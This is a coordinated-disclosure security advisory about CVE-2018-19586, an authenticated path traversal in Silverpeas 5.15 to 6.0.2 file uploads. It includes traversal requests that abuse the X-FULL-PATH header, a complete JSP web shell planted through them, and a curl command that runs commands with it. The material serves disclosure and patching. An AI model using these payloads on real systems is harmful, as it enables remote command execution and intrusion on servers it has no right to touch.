Silverpeas 5.15 To 6.0.2: Path Traversal

by Bastien Faure, on Jan 15, 2019 1:09:16 PM

Product Description

From the vendor’s website:

“Silverpeas is an open source WEB platform that improves the collaboration between the actors of a company or organization.” Silverpeas is widely used by many notable French organizations including those in the media, retail, and government space. 

Vulnerabilities List

One vulnerability was identified within the Silverpeas 5.15 to 6.0.2 application. 

Affected Versions

5.15 to 6.0.2

Solution

If you are using the affected versions of the Silverpeas software, please ensure you have the following mitigations installed: 

 

Path Traversal

Silverpeas 5.15 to 6.0.2 is affected by an authenticated path traversal vulnerability that can be triggered during file uploads. This vulnerability enables regular users to write arbitrary files on the underlying system with the privileges of the user running the application. An attacker may leverage the vulnerability to write an executable JSP file in an exposed web directory and execute commands on the underlying system.

Vulnerability Details

CVE ID: CVE-2018-19586

Access Vector: Remote 

Security Risk: Critical 

Vulnerability: CWE-23

CVSS Base Score: 9.9

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

The path traversal vulnerability is located in an upload mechanism that is reachable across several other features (e.g., forum, ideas) with regular user privileges. The application takes the upload path from the HTTP header without proper sanitization:

POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../../../../../../tmp/test.png

FILE CONTENTS

The file is then created in /tmp:

root@vulns:/tmp# ls -lah | grep -i test
-rw-r--r-- 1 root root 201 nov. 16 02:53 test.png

By default, files are uploaded to $SILVERPEAS_HOME/data/temp/[UUID]/, which is outside the application’s main directory. Through the use of the Silverpeas official installer, the core package (containing main Java classes and JSP files) is deployed in a virtual file system (VFS) whose path is randomized and not writable. However, the installer ships another web application resource (WAR) that is reachable under /weblib/ and whose path is not randomized.

The request below can be used to deploy a malicious JSP file

POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../web/weblib.war/Aurora/css/webshell.jsp
…omitted for brevity…

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"\n"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<%=output %>

Command execution can then be achieved by using the deployed file, highlighted below:

$ curl 'http://vulns.lan:8000/weblib/Aurora/css/webshell.jsp?cmd=ls'

appclient
bin
copyright.txt
docs
domain
jboss-modules.jar
LICENSE.txt
modules
README.txt
standalone
welcome-content

The issue is due to a lack of user-input sanitization in the FileUploadData Java class. For more information, see:

Disclosure Timeline: 

  • 11/10/2018: Initial discovery for version 6.0.2
  • 11/26/2018: Initial notification of product vendor
  • 12/01/2018: Versions 5.15 to 6.0.2 discovered to be affected
  • 12/14/2018: Patches released for 5.15 and 6.0 

Researcher:

Bastien Faure, Security Associate at Bishop Fox
Vulnerabilities:Path Traversal

Comments

Vulnerability Disclosure Policy

Bishop Fox takes security issues very seriously. We believe in coordinated disclosure, and we work closely with vendors and clients to patch vulnerabilities promptly. More on our Disclosure Policy →

Subscribe to Updates